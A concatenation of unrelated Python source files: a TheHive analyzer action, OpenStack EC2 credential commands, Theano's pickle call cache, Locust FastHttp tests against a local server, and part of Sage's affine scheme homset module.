'RunAnalyzerOnDataTypeAction'
]
class RunAnalyzerOnDataTypeAction(Action):
def run(self, case_id, data_type, analyzer_name, linked_task_name=None):
api = TheHiveApiExtended(self.config['thehive_url'], self.config['thehive_api_key'])
linked_task_id = None
if linked_task_name:
response = api.get_case_tasks(case_id, query=Eq('title', linked_task_name))
if response.status_code == 200:
tasks = response.json()
if len(tasks) == 1:
linked_task_id = tasks[0]['id']
else:
raise ValueError('[RunAnalyzerOnDataTypeAction]: task not found')
else:
raise ValueError('[RunAnalyzerOnDataTypeAction]: tasks status_code %d'
% response.status_code)
analyzer = api.get_analyzer_by_name_and_data_type(analyzer_name, data_type)
response = api.get_case_observables(case_id, query=Eq('dataType', data_type))
if response.status_code == 200:
observables = response.json()
if len(observables) == 1:
for observable in observables:
cortex_id = random.choice(analyzer['cortexIds'])
response_job = api.run_analyzer(cortex_id, observable['id'], analyzer['id'])
if response_job.status_code == 200:
job = response_job.json()
if linked_task_id:
self.action_service.set_value(
name='thehive_job_{}'.format(job['id']),
value=linked_task_id,
local=False
)
return job
else:
raise ValueError('[RunAnalyzerOnDataTypeAction]: job status_code %d'
% response.status_code)
else:
raise ValueError('[RunAnalyzerOnDataTypeAction]: no observable')
else:
raise ValueError('[RunAnalyzerOnDataTypeAction]: status_code %d' % response.status_code)
|
# Copyright 2012 OpenStack Foundation
# Copyright 2013 Nebula Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""Identity v2 EC2 Credentials action implementations"""
import logging
from osc_lib.command import command
from osc_lib import exceptions
from osc_lib import utils
from openstackclient.i18n import _
LOG = logging.getLogger(__name__)
class CreateEC2Creds(command.ShowOne):
_description = _("Create EC2 credentials")
def get_parser(self, prog_name):
parser = super(CreateEC2Creds, self).get_parser(prog_name)
parser.add_argument(
'--project',
metavar='<project>',
help=_(
'Create credentials in project '
'(name or ID; default: current authenticated project)'
),
)
parser.add_argument(
'--user',
metavar='<user>',
help=_(
'Create credentials for user '
'(name or ID; default: current authenticated user)'
),
)
return parser
def take_action(self, parsed_args):
identity_client = self.app.client_manager.identity
if parsed_args.project:
project = utils.find_resource(
identity_client.tenants,
parsed_args.project,
).id
else:
# Get the project from the current auth
project = self.app.client_manager.auth_ref.project_id
if parsed_args.user:
user = utils.find_resource(
identity_client.users,
parsed_args.user,
).id
else:
# Get the user from the current auth
user = self.app.client_manager.auth_ref.user_id
creds = identity_client.ec2.create(user, project)
info = {}
info.update(creds._info)
if 'tenant_id' in info:
info.update(
{'project_id': info.pop('tenant_id')}
)
return zip(*sorted(info.items()))
class DeleteEC2Creds(command.Command):
_description = _("Delete EC2 credentials")
def get_parser(self, prog_name):
parser = super(DeleteEC2Creds, self).get_parser(prog_name)
parser.add_argument(
'access_keys',
metavar='<access-key>',
nargs='+',
help=_('Credentials access key(s)'),
)
parser.add_argument(
'--user',
metavar='<user>',
help=_('Delete credentials for user (name or ID)'),
)
return parser
def take_action(self, parsed_args):
identity_client = self.app.client_manager.identity
if parsed_args.user:
user = utils.find_resource(
identity_client.users,
parsed_args.user,
).id
else:
# Get the user from the current auth
user = self.app.client_manager.auth_ref.user_id
result = 0
for access_key in parsed_args.access_keys:
try:
identity_client.ec2.delete(user, access_key)
except Exception as e:
result += 1
LOG.error(_("Failed to delete EC2 credentials with "
"access key '%(access_key)s': %(e)s"),
{'access_key': access_key, 'e': e})
if result > 0:
total = len(parsed_args.access_keys)
msg = (_("%(result)s of %(total)s EC2 keys failed "
"to delete.") % {'result': result, 'total': total})
raise exceptions.CommandError(msg)
class ListEC2Creds(command.Lister):
_description = _("List EC2 credentials")
def get_parser(self, prog_name):
parser = super(ListEC2Creds, self).get_parser(prog_name)
parser.add_argument(
'--user',
metavar='<user>',
help=_('Filter list by user (name or ID)'),
)
return parser
def take_action(self, parsed_args):
identity_client = self.app.client_manager.identity
if parsed_args.user:
user = utils.find_resource(
identity_client.users,
parsed_args.user,
).id
else:
# Get the user from the current auth
user = self.app.client_manager.auth_ref.user_id
columns = ('access', 'secret', 'tenant_id', 'user_id')
column_headers = ('Access', 'Secret', 'Project ID', 'User ID')
data = identity_client.ec2.list(user)
return (column_headers,
(utils.get_item_properties(
s, columns,
formatters={},
) for s in data))
class ShowEC2Creds(command.ShowOne):
_description = _("Display EC2 credentials details")
def get_parser(self, prog_name):
parser = super(ShowEC2Creds, self).get_parser(prog_name)
parser.add_argument(
'access_key',
metavar='<access-key>',
help=_('Credentials access key'),
)
parser.add_argument(
'--user',
metavar='<user>',
help=_('Show credentials for user (name or ID)'),
)
return parser
def take_action(self, parsed_args):
identity_client = self.app.client_manager.identity
if parsed_args.user:
user = utils.find_resource(
identity_client.users,
parsed_args.user,
).id
else:
# Get the user from the current auth
user = self.app.client_manager.auth_ref.user_id
creds = identity_client.ec2.get(user, parsed_args.access_key)
info = {}
info.update(creds._info)
if 'tenant_id' in info:
info.update(
{'project_id': info.pop('tenant_id')}
)
return zip(*sorted(info.items()))
|
import logging
import pickle
_logger = logging.getLogger("theano.gof.callcache")
class CallCache:
def __init__(self, filename=None):
self.filename = filename
try:
if filename is None:
raise OSError("bad filename") # just goes to except
with open(filename) as f:
self.cache = pickle.load(f)
except OSError:
self.cache = {}
def persist(self, filename=None):
"""
Cache "filename" as a pickle file
"""
if filename is None:
filename = self.filename
with open(filename, "w") as f:
pickle.dump(self.cache, f)
def call(self, fn, args=(), key=None):
"""
Retrieve item from the cache(if available)
based on a key
Parameters:
----------
key
parameter to retrieve cache item
fn,args
key to retrieve if "key" is None
"""
if key is None:
key = (fn, tuple(args))
if key not in self.cache:
_logger.debug("cache miss %i", len(self.cache))
self.cache[key] = fn(*args)
else:
_logger.debug("cache hit %i", len(self.cache))
return self.cache[key]
def __del__(self):
try:
if self.filename:
self.persist()
except Exception as e:
_logger.error("persist failed %s %s", self.filename, e)
|
import socket
import gevent
import time
from tempfile import NamedTemporaryFile
from locust.user import task, TaskSet
from locust.contrib.fasthttp import FastHttpSession
from locust import FastHttpUser
from locust.exception import CatchResponseError, InterruptTaskSet, ResponseError
from locust.main import is_user_class
from .testcases import WebserverTestCase, LocustTestCase
from .util import create_tls_cert
class TestFastHttpSession(WebserverTestCase):
def get_client(self):
return FastHttpSession(self.environment, base_url="http://127.0.0.1:%i" % self.port, user=None)
def test_get(self):
s = self.get_client()
r = s.get("/ultra_fast")
self.assertEqual(200, r.status_code)
def test_connection_error(self):
s = FastHttpSession(self.environment, "http://localhost:1", user=None)
r = s.get("/", timeout=0.1)
self.assertEqual(r.status_code, 0)
self.assertEqual(None, r.content)
self.assertEqual(1, len(self.runner.stats.errors))
self.assertTrue(isinstance(r.error, ConnectionRefusedError))
self.assertTrue(isinstance(next(iter(self.runner.stats.errors.values())).error, ConnectionRefusedError))
def test_404(self):
s = self.get_client()
r = s.get("/does_not_exist")
self.assertEqual(404, r.status_code)
self.assertEqual(1, self.runner.stats.get("/does_not_exist", "GET").num_failures)
def test_204(self):
s = self.get_client()
r = s.get("/status/204")
self.assertEqual(204, r.status_code)
self.assertEqual(1, self.runner.stats.get("/status/204", "GET").num_requests)
self.assertEqual(0, self.runner.stats.get("/status/204", "GET").num_failures)
def test_streaming_response(self):
"""
Test a request to an endpoint that returns a streaming response
"""
s = self.get_client()
r = s.get("/streaming/30")
# verify that the time reported includes the download time of the whole streamed response
self.assertGreater(self.runner.stats.get("/streaming/30", method="GET").avg_response_time, 250)
self.runner.stats.clear_all()
# verify that response time does NOT include whole download time, when using stream=True
r = s.get("/streaming/30", stream=True)
self.assertGreaterEqual(self.runner.stats.get("/streaming/30", method="GET").avg_response_time, 0)
self.assertLess(self.runner.stats.get("/streaming/30", method="GET").avg_response_time, 250)
# download the content of the streaming response (so we don't get an ugly exception in the log)
_ = r.content
def test_slow_redirect(self):
s = self.get_client()
url = "/redirect?url=/redirect&delay=0.5"
r = s.get(url)
stats = self.runner.stats.get(url, method="GET")
self.assertEqual(1, stats.num_requests)
self.assertGreater(stats.avg_response_time, 500)
def test_post_redirect(self):
s = self.get_client()
url = "/redirect"
r = s.post(url)
self.assertEqual(200, r.status_code)
post_stats = self.runner.stats.get(url, method="POST")
get_stats = self.runner.stats.get(url, method="GET")
self.assertEqual(1, post_stats.num_requests)
self.assertEqual(0, get_stats.num_requests)
def test_cookie(self):
s = self.get_client()
r = s.post("/set_cookie?name=testcookie&value=1337")
self.assertEqual(200, r.status_code)
r = s.get("/get_cookie?name=testcookie")
self.assertEqual("1337", r.content.decode())
def test_head(self):
s = self.get_client()
r = s.head("/request_method")
self.assertEqual(200, r.status_code)
self.assertEqual("", r.content.decode())
def test_delete(self):
s = self.get_client()
r = s.delete("/request_method")
self.assertEqual(200, r.status_code)
self.assertEqual("DELETE", r.content.decode())
def test_patch(self):
s = self.get_client()
r = s.patch("/request_method")
self.assertEqual(200, r.status_code)
self.assertEqual("PATCH", r.content.decode())
def test_options(self):
s = self.get_client()
r = s.options("/request_method")
self.assertEqual(200, r.status_code)
self.assertEqual("", r.content.decode())
self.assertEqual(
set(["OPTIONS", "DELETE", "PUT", "GET", "POST", "HEAD", "PATCH"]),
set(r.headers["allow"].split(", ")),
)
def test_json_payload(self):
s = self.get_client()
r = s.post("/request_method", json={"foo": "bar"})
self.assertEqual(200, r.status_code)
def test_catch_response_fail_successful_request(self):
s = self.get_client()
with s.get("/ultra_fast", catch_response=True) as r:
r.failure("nope")
self.assertEqual(1, self.environment.stats.get("/ultra_fast", "GET").num_requests)
self.assertEqual(1, self.environment.stats.get("/ultra_fast", "GET").num_failures)
def test_catch_response_pass_failed_request(self):
s = self.get_client()
with s.get("/fail", catch_response=True) as r:
r.success()
self.assertEqual(1, self.environment.stats.total.num_requests)
self.assertEqual(0, self.environment.stats.total.num_failures)
def test_catch_response_multiple_failure_and_success(self):
s = self.get_client()
with s.get("/ultra_fast", catch_response=True) as r:
r.failure("nope")
r.success()
r.failure("nooo")
r.success()
self.assertEqual(1, self.environment.stats.total.num_requests)
self.assertEqual(0, self.environment.stats.total.num_failures)
def test_catch_response_pass_failed_request_with_other_exception_within_block(self):
class OtherException(Exception):
pass
s = self.get_client()
try:
with s.get("/fail", catch_response=True) as r:
r.success()
raise OtherException("wtf")
except OtherException as e:
pass
else:
self.fail("OtherException should have been raised")
self.assertEqual(1, self.environment.stats.total.num_requests)
self.assertEqual(0, self.environment.stats.total.num_failures)
def test_catch_response_default_success(self):
s = self.get_client()
with s.get("/ultra_fast", catch_response=True) as r:
pass
self.assertEqual(1, self.environment.stats.get("/ultra_fast", "GET").num_requests)
self.assertEqual(0, self.environment.stats.get("/ultra_fast", "GET").num_failures)
def test_catch_response_default_fail(self):
s = self.get_client()
with s.get("/fail", catch_response=True) as r:
pass
self.assertEqual(1, self.environment.stats.total.num_requests)
self.assertEqual(1, self.environment.stats.total.num_failures)
def test_error_message_with_name_replacement(self):
s = self.get_client()
kwargs = {}
def on_request(**kw):
self.assertIsNotNone(kw["exception"])
kwargs.update(kw)
self.environment.events.request.add_listener(on_request)
before_request = time.time()
s.request("get", "/wrong_url/01", name="replaced_url_name", context={"foo": "bar"})
after_request = time.time()
# self.assertIn("for url: replaced_url_name", str(kwargs["exception"])) # this is actually broken for FastHttpUser right now...
self.assertAlmostEqual(before_request, kwargs["start_time"], delta=0.01)
self.assertAlmostEqual(after_request, kwargs["start_time"] + kwargs["response_time"] / 1000, delta=0.01)
self.assertEqual("/wrong_url/01", kwargs["url"]) # url is unaffected by name
self.assertDictEqual({"foo": "bar"}, kwargs["context"])
class TestRequestStatsWithWebserver(WebserverTestCase):
def test_request_stats_content_length(self):
class MyUser(FastHttpUser):
host = "http://127.0.0.1:%i" % self.port
locust = MyUser(self.environment)
locust.client.get("/ultra_fast")
self.assertEqual(
self.runner.stats.get("/ultra_fast", "GET").avg_content_length, len("This is an ultra fast response")
)
locust.client.get("/ultra_fast")
self.assertEqual(
self.runner.stats.get("/ultra_fast", "GET").avg_content_length, len("This is an ultra fast response")
)
def test_request_stats_no_content_length(self):
class MyUser(FastHttpUser):
host = "http://127.0.0.1:%i" % self.port
l = MyUser(self.environment)
path = "/no_content_length"
r = l.client.get(path)
self.assertEqual(
self.runner.stats.get(path, "GET").avg_content_length,
len("This response does not have content-length in the header"),
)
def test_request_stats_no_content_length_streaming(self):
class MyUser(FastHttpUser):
host = "http://127.0.0.1:%i" % self.port
l = MyUser(self.environment)
path = "/no_content_length"
r = l.client.get(path, stream=True)
self.assertEqual(0, self.runner.stats.get(path, "GET").avg_content_length)
def test_request_stats_named_endpoint(self):
class MyUser(FastHttpUser):
host = "http://127.0.0.1:%i" % self.port
locust = MyUser(self.environment)
locust.client.get("/ultra_fast", name="my_custom_name")
self.assertEqual(1, self.runner.stats.get("my_custom_name", "GET").num_requests)
def test_request_stats_query_variables(self):
class MyUser(FastHttpUser):
host = "http://127.0.0.1:%i" % self.port
locust = MyUser(self.environment)
locust.client.get("/ultra_fast?query=1")
self.assertEqual(1, self.runner.stats.get("/ultra_fast?query=1", "GET").num_requests)
def test_request_stats_put(self):
class MyUser(FastHttpUser):
host = "http://127.0.0.1:%i" % self.port
locust = MyUser(self.environment)
locust.client.put("/put")
self.assertEqual(1, self.runner.stats.get("/put", "PUT").num_requests)
def test_request_connection_error(self):
class MyUser(FastHttpUser):
host = "http://localhost:1"
locust = MyUser(self.environment)
response = locust.client.get("/", timeout=0.1)
self.assertEqual(response.status_code, 0)
self.assertEqual(1, self.runner.stats.get("/", "GET").num_failures)
self.assertEqual(1, self.runner.stats.get("/", "GET").num_requests)
class TestFastHttpUserClass(WebserverTestCase):
def test_is_abstract(self):
self.assertTrue(FastHttpUser.abstract)
self.assertFalse(is_user_class(FastHttpUser))
def test_class_context(self):
class MyUser(FastHttpUser):
host = "http://127.0.0.1:%i" % self.port
def context(self):
return {"user": self.username}
kwargs = {}
def on_request(**kw):
kwargs.update(kw)
self.environment.events.request.add_listener(on_request)
user = MyUser(self.environment)
user.username = "foo"
user.client.request("get", "/request_method")
self.assertDictEqual({"user": "foo"}, kwargs["context"])
self.assertEqual("GET", kwargs["response"].text)
user.client.request("get", "/request_method", context={"user": "bar"})
self.assertDictEqual({"user": "bar"}, kwargs["context"])
def test_get_request(self):
self.response = ""
def t1(l):
self.response = l.client.get("/ultra_fast")
class MyUser(FastHttpUser):
tasks = [t1]
host = "http://127.0.0.1:%i" % self.port
my_locust = MyUser(self.environment)
t1(my_locust)
self.assertEqual(self.response.text, "This is an ultra fast response")
def test_client_request_headers(self):
class MyUser(FastHttpUser):
host = "http://127.0.0.1:%i" % self.port
locust = MyUser(self.environment)
self.assertEqual("hello", locust.client.get("/request_header_test", headers={"X-Header-Test": "hello"}).text)
def test_client_get(self):
class MyUser(FastHttpUser):
host = "http://127.0.0.1:%i" % self.port
locust = MyUser(self.environment)
self.assertEqual("GET", locust.client.get("/request_method").text)
def test_client_get_absolute_url(self):
class MyUser(FastHttpUser):
host = "http://127.0.0.1:%i" % self.port
locust = MyUser(self.environment)
self.assertEqual("GET", locust.client.get("http://127.0.0.1:%i/request_method" % self.port).text)
def test_client_post(self):
class MyUser(FastHttpUser):
host = "http://127.0.0.1:%i" % self.port
locust = MyUser(self.environment)
self.assertEqual("POST", locust.client.post("/request_method", {"arg": "hello world"}).text)
self.assertEqual("hello world", locust.client.post("/post", {"arg": "hello world"}).text)
def test_client_put(self):
class MyUser(FastHttpUser):
host = "http://127.0.0.1:%i" % self.port
locust = MyUser(self.environment)
self.assertEqual("PUT", locust.client.put("/request_method", {"arg": "hello world"}).text)
self.assertEqual("hello world", locust.client.put("/put", {"arg": "hello world"}).text)
def test_client_delete(self):
class MyUser(FastHttpUser):
host = "http://127.0.0.1:%i" % self.port
locust = MyUser(self.environment)
self.assertEqual("DELETE", locust.client.delete("/request_method").text)
self.assertEqual(200, locust.client.delete("/request_method").status_code)
def test_client_head(self):
class MyUser(FastHttpUser):
host = "http://127.0.0.1:%i" % self.port
locust = MyUser(self.environment)
self.assertEqual(200, locust.client.head("/request_method").status_code)
def test_log_request_name_argument(self):
self.response = ""
class MyUser(FastHttpUser):
tasks = []
host = "http://127.0.0.1:%i" % self.port
@task()
def t1(l):
self.response = l.client.get("/ultra_fast", name="new name!")
my_locust = MyUser(self.environment)
my_locust.t1()
self.assertEqual(1, self.runner.stats.get("new name!", "GET").num_requests)
self.assertEqual(0, self.runner.stats.get("/ultra_fast", "GET").num_requests)
def test_redirect_url_original_path_as_name(self):
class MyUser(FastHttpUser):
host = "http://127.0.0.1:%i" % self.port
l = MyUser(self.environment)
l.client.get("/redirect")
self.assertEqual(1, len(self.runner.stats.entries))
self.assertEqual(1, self.runner.stats.get("/redirect", "GET").num_requests)
self.assertEqual(0, self.runner.stats.get("/ultra_fast", "GET").num_requests)
def test_network_timeout_setting(self):
class MyUser(FastHttpUser):
network_timeout = 0.5
host = "http://127.0.0.1:%i" % self.port
l = MyUser(self.environment)
timeout = gevent.Timeout(
seconds=0.6,
exception=AssertionError(
"Request took longer than 0.6 even though FastHttpUser.network_timeout was set to 0.5"
),
)
timeout.start()
r = l.client.get("/redirect?url=/redirect&delay=5.0")
timeout.cancel()
self.assertTrue(isinstance(r.error.original, socket.timeout))
self.assertEqual(1, self.runner.stats.get("/redirect?url=/redirect&delay=5.0", "GET").num_failures)
def test_max_redirect_setting(self):
class MyUser(FastHttpUser):
max_redirects = 1 # max_redirects and max_retries are funny names, because they are actually max attempts
host = "http://127.0.0.1:%i" % self.port
l = MyUser(self.environment)
l.client.get("/redirect")
self.assertEqual(1, self.runner.stats.get("/redirect", "GET").num_failures)
def test_allow_redirects_override(self):
class MyLocust(FastHttpUser):
host = "http://127.0.0.1:%i" % self.port
l = MyLocust(self.environment)
resp = l.client.get("/redirect", allow_redirects=False)
self.assertEqual("http://127.0.0.1:%i/ultra_fast" % self.port, resp.headers["location"])
resp = l.client.get("/redirect") # ensure redirect still works
self.assertFalse("location" in resp.headers)
def test_slow_redirect(self):
s = FastHttpSession(self.environment, "http://127.0.0.1:%i" % self.port, user=None)
url = "/redirect?url=/redirect&delay=0.5"
r = s.get(url)
stats = self.runner.stats.get(url, method="GET")
self.assertEqual(1, stats.num_requests)
self.assertGreater(stats.avg_response_time, 500)
def test_client_basic_auth(self):
class MyUser(FastHttpUser):
host = "http://127.0.0.1:%i" % self.port
class MyAuthorizedUser(FastHttpUser):
host = "http://locust:menace@127.0.0.1:%i" % self.port
class MyUnauthorizedUser(FastHttpUser):
host = "http://locust:wrong@127.0.0.1:%i" % self.port
locust = MyUser(self.environment)
unauthorized = MyUnauthorizedUser(self.environment)
authorized = MyAuthorizedUser(self.environment)
response = authorized.client.get("/basic_auth")
self.assertEqual(200, response.status_code)
self.assertEqual("Authorized", response.text)
self.assertEqual(401, locust.client.get("/basic_auth").status_code)
self.assertEqual(401, unauthorized.client.get("/basic_auth").status_code)
class TestFastHttpCatchResponse(WebserverTestCase):
def setUp(self):
super().setUp()
class MyUser(FastHttpUser):
host = "http://127.0.0.1:%i" % self.port
self.locust = MyUser(self.environment)
self.num_failures = 0
self.num_success = 0
def on_request(exception, **kwargs):
if exception:
self.num_failures += 1
self.last_failure_exception = exception
else:
self.num_success += 1
self.environment.events.request.add_listener(on_request)
def test_catch_response(self):
self.assertEqual(500, self.locust.client.get("/fail").status_code)
self.assertEqual(1, self.num_failures)
self.assertEqual(0, self.num_success)
with self.locust.client.get("/ultra_fast", catch_response=True) as response:
pass
self.assertEqual(1, self.num_failures)
self.assertEqual(1, self.num_success)
self.assertIn("ultra fast", str(response.content))
with self.locust.client.get("/ultra_fast", catch_response=True) as response:
raise ResponseError("Not working")
self.assertEqual(2, self.num_failures)
self.assertEqual(1, self.num_success)
def test_catch_response_http_fail(self):
with self.locust.client.get("/fail", catch_response=True) as response:
pass
self.assertEqual(1, self.num_failures)
self.assertEqual(0, self.num_success)
def test_catch_response_http_manual_fail(self):
with self.locust.client.get("/ultra_fast", catch_response=True) as response:
response.failure("Haha!")
self.assertEqual(1, self.num_failures)
self.assertEqual(0, self.num_success)
self.assertTrue(
isinstance(self.last_failure_exception, CatchResponseError),
"Failure event handler should have been passed a CatchResponseError instance",
)
def test_catch_response_http_manual_success(self):
with self.locust.client.get("/fail", catch_response=True) as response:
response.success()
self.assertEqual(0, self.num_failures)
self.assertEqual(1, self.num_success)
def test_catch_response_allow_404(self):
with self.locust.client.get("/does/not/exist", catch_response=True) as response:
self.assertEqual(404, response.status_code)
if response.status_code == 404:
response.success()
self.assertEqual(0, self.num_failures)
self.assertEqual(1, self.num_success)
def test_interrupt_taskset_with_catch_response(self):
class MyTaskSet(TaskSet):
@task
def interrupted_task(self):
with self.client.get("/ultra_fast", catch_response=True) as r:
raise InterruptTaskSet()
class MyUser(FastHttpUser):
host = "http://127.0.0.1:%i" % self.port
tasks = [MyTaskSet]
l = MyUser(self.environment)
ts = MyTaskSet(l)
self.assertRaises(InterruptTaskSet, lambda: ts.interrupted_task())
self.assertEqual(0, self.num_failures)
self.assertEqual(0, self.num_success)
def test_catch_response_connection_error_success(self):
class MyUser(FastHttpUser):
host = "http://127.0.0.1:1"
l = MyUser(self.environment)
with l.client.get("/", catch_response=True) as r:
self.assertEqual(r.status_code, 0)
self.assertEqual(None, r.content)
r.success()
self.assertEqual(1, self.num_success)
self.assertEqual(0, self.num_failures)
def test_catch_response_connection_error_fail(self):
class MyUser(FastHttpUser):
host = "http://127.0.0.1:1"
l = MyUser(self.environment)
with l.client.get("/", catch_response=True) as r:
self.assertEqual(r.status_code, 0)
self.assertEqual(None, r.content)
r.failure("Manual fail")
self.assertEqual(0, self.num_success)
self.assertEqual(1, self.num_failures)
def test_deprecated_request_events(self):
status = {"success_amount": 0, "failure_amount": 0}
def on_success(**kw):
status["success_amount"] += 1
def on_failure(**kw):
status["failure_amount"] += 1
self.environment.events.request_success.add_listener(on_success)
self.environment.events.request_failure.add_listener(on_failure)
with self.locust.client.get("/ultra_fast", catch_response=True) as response:
pass
with self.locust.client.get("/wrong_url", catch_response=True) as response:
pass
self.assertEqual(1, status["success_amount"])
self.assertEqual(1, status["failure_amount"])
class TestFastHttpSsl(LocustTestCase):
def setUp(self):
super().setUp()
tls_cert, tls_key = create_tls_cert("127.0.0.1")
self.tls_cert_file = NamedTemporaryFile()
self.tls_key_file = NamedTemporaryFile()
with open(self.tls_cert_file.name, "w") as f:
f.write(tls_cert.decode())
with open(self.tls_key_file.name, "w") as f:
f.write(tls_key.decode())
self.web_ui = self.environment.create_web_ui(
"127.0.0.1",
0,
tls_cert=self.tls_cert_file.name,
tls_key=self.tls_key_file.name,
)
gevent.sleep(0.01)
self.web_port = self.web_ui.server.server_port
def tearDown(self):
super().tearDown()
self.web_ui.stop()
def test_ssl_request_insecure(self):
s = FastHttpSession(self.environment, "https://127.0.0.1:%i" % self.web_port, insecure=True, user=None)
r = s.get("/")
self.assertEqual(200, r.status_code)
self.assertIn("<title>Locust for None</title>", r.content.decode("utf-8"))
self.assertIn("<p>Script: <span>None</span></p>", r.text)
|
r"""
Set of homomorphisms between two affine schemes
For schemes `X` and `Y`, this module implements the set of morphisms
`Hom(X,Y)`. This is done by :class:`SchemeHomset_generic`.
As a special case, the Hom-sets can also represent the points of a
scheme. Recall that the `K`-rational points of a scheme `X` over `k`
can be identified with the set of morphisms `Spec(K) \to X`. In Sage
the rational points are implemented by such scheme morphisms. This is
done by :class:`SchemeHomset_points` and its subclasses.
.. note::
You should not create the Hom-sets manually. Instead, use the
:meth:`~sage.structure.parent.Hom` method that is inherited by all
schemes.
AUTHORS:
- William Stein (2006): initial version.
- Ben Hutz (2018): add numerical point support
"""
#*****************************************************************************
# Copyright (C) 2006 William Stein <wstein@gmail.com>
#
# Distributed under the terms of the GNU General Public License (GPL)
# as published by the Free Software Foundation; either version 2 of
# the License, or (at your option) any later version.
# http://www.gnu.org/licenses/
#*****************************************************************************
from sage.misc.verbose import verbose
from sage.rings.all import ZZ, CC, RR
from sage.rings.rational_field import is_RationalField
from sage.categories.fields import Fields
from sage.categories.number_fields import NumberFields
from sage.rings.finite_rings.finite_field_constructor import is_FiniteField
from sage.rings.polynomial.polynomial_ring_constructor import PolynomialRing
import sage.schemes.generic.homset
from copy import copy
#*******************************************************************
# Affine varieties
#*******************************************************************
class SchemeHomset_points_spec(sage.schemes.generic.homset.SchemeHomset_generic):
"""
Set of rational points of an affine variety.
INPUT:
See :class:`SchemeHomset_generic`.
EXAMPLES::
sage: from sage.schemes.affine.affine_homset import SchemeHomset_points_spec
sage: SchemeHomset_points_spec(Spec(QQ), Spec(QQ))
Set of rational points of Spectrum of Rational Field
"""
def _element_constructor_(self, *args, **kwds):
"""
The element constructor.
EXAMPLES::
sage: X = Spec(QQ)
sage: ring_hom = QQ.hom((1,), QQ); ring_hom
Ring endomorphism of Rational Field
Defn: 1 |--> 1
sage: H = X.Hom(X)
sage: H(ring_hom)
Affine Scheme endomorphism of Spectrum of Rational Field
Defn: Ring endomorphism of Rational Field
Defn: 1 |--> 1
TESTS::
sage: H._element_constructor_(ring_hom)
Affine Scheme endomorphism of Spectrum of Rational Field
Defn: Ring endomorphism of Rational Field
Defn: 1 |--> 1
"""
return sage.schemes.generic.homset.SchemeHomset_generic._element_constructor_(self, *args, **kwds)
def _repr_(self):
"""
Return a string representation of a homset.
OUTPUT: A string.
EXAMPLES::
sage: from sage.schemes.affine.affine_homset import SchemeHomset_points_spec
sage: S = SchemeHomset_points_spec(Spec(QQ), Spec(QQ))
sage: S._repr_()
'Set of rational points of Spectrum of Rational Field'
"""
return 'Set of rational points of '+str(self.codomain())
#*******************************************************************
# Affine varieties
#*******************************************************************
class SchemeHomset_points_affine(sage.schemes.generic.homset.SchemeHomset_points):
"""
Set of rational points of an affine variety.
INPUT:
See :class:`SchemeHomset_generic`.
EXAMPLES::
sage: from sage.schemes.affine.affine_homset import SchemeHomset_points_affine
sage: SchemeHomset_points_affine(Spec(QQ), AffineSpace(ZZ,2))
Set of rational points of Affine Space of dimension 2 over Rational Field
"""
def points(self, **kwds):
r"""
Return some or all rational points of an affine scheme.
For dimension 0 subschemes points are determined through a groebner
basis calculation. For schemes or subschemes with dimension greater than 1
points are determined through enumeration up to the specified bound.
Over a finite field, all points are returned. Over an infinite field, all points satisfying the bound
are returned. For a zero-dimensional subscheme, all points are returned regardless of whether the field
is infinite or not.
For number fields, this uses the
Doyle-Krumm algorithm 4 (algorithm 5 for imaginary quadratic) for
computing algebraic numbers up to a given height [DK2013]_.
The algorithm requires floating point arithmetic, so the user is
allowed to specify the precision for such calculations.
Additionally, due to floating point issues, points
slightly larger than the bound may be returned. This can be controlled
by lowering the tolerance.
INPUT:
kwds:
- ``bound`` - real number (optional, default: 0). The bound for the
height of the coordinates. Only used for subschemes with
dimension at least 1.
- ``zero_tolerance`` - positive real number (optional, default=10^(-10)).
For numerically inexact fields, points are on the subscheme if they
satisfy the equations to within tolerance.
- ``tolerance`` - a rational number in (0,1] used in doyle-krumm algorithm-4
for enumeration over number fields.
- ``precision`` - the precision to use for computing the elements of
bounded height of number fields.
OUTPUT:
- a list of rational points of a affine scheme
.. WARNING::
For numerically inexact fields such as ComplexField or RealField the
list of points returned is very likely to be incomplete. It may also
contain repeated points due to tolerance.
EXAMPLES: The bug reported at #11526 is fixed::
sage: A2 = AffineSpace(ZZ, 2)
sage: F = GF(3)
sage: A2(F).points()
[(0, 0), (0, 1), (0, 2), (1, 0), (1, 1), (1, 2), (2, 0), (2, 1), (2, 2)]
::
sage: A.<x,y> = ZZ[]
sage: I = A.ideal(x^2-y^2-1)
sage: V = AffineSpace(ZZ, 2)
sage: X = V.subscheme(I)
sage: M = X(ZZ)
sage: M.points(bound=1)
[(-1, 0), (1, 0)]
::
sage: u = QQ['u'].0
sage: K.<v> = NumberField(u^2 + 3)
sage: A.<x,y> = AffineSpace(K, 2)
sage: len(A(K).points(bound=2))
1849
::
sage: A.<x,y> = AffineSpace(QQ, 2)
sage: E = A.subscheme([x^2 + y^2 - 1, y^2 - x^3 + x^2 + x - 1])
sage: E(A.base_ring()).points()
[(-1, 0), (0, -1), (0, 1), (1, 0)]
::
sage: A.<x,y> = AffineSpace(CC, 2)
sage: E = A.subscheme([y^3 - x^3 - x^2, x*y])
sage: E(A.base_ring()).points()
verbose 0 (124: affine_homset.py, points) Warning: computations in the numerical fields are inexact;points may be computed partially or incorrectly.
[(-1.00000000000000, 0.000000000000000),
(0.000000000000000, 0.000000000000000)]
::
sage: A.<x1,x2> = AffineSpace(CDF, 2)
sage: E = A.subscheme([x1^2 + x2^2 + x1*x2, x1 + x2])
sage: E(A.base_ring()).points()
verbose 0 (124: affine_homset.py, points) Warning: computations in the numerical fields are inexact;points may be computed partially or incorrectly.
[(0.0, 0.0)]
"""
from sage.schemes.affine.affine_space import is_AffineSpace
X = self.codomain()
if not is_AffineSpace(X) and X.base_ring() in Fields():
if hasattr(X.base_ring(), 'precision'):
numerical = True
verbose("Warning: computations in the numerical fields are inexact;points may be computed partially or incorrectly.", level=0)
zero_tol = RR(kwds.pop('zero_tolerance', 10**(-10)))
if zero_tol <= 0:
raise ValueError("tolerance must be positive")
else:
numerical = False
# Then X must be a subscheme
dim_ideal = X.defining_ideal().dimension()
if dim_ideal < 0: # no points
return []
if dim_ideal == 0: # if X zero-dimensional
rat_points = []
AS = X.ambient_space()
N = AS.dimension_relative()
BR = X.base_ring()
#need a lexicographic ordering for elimination
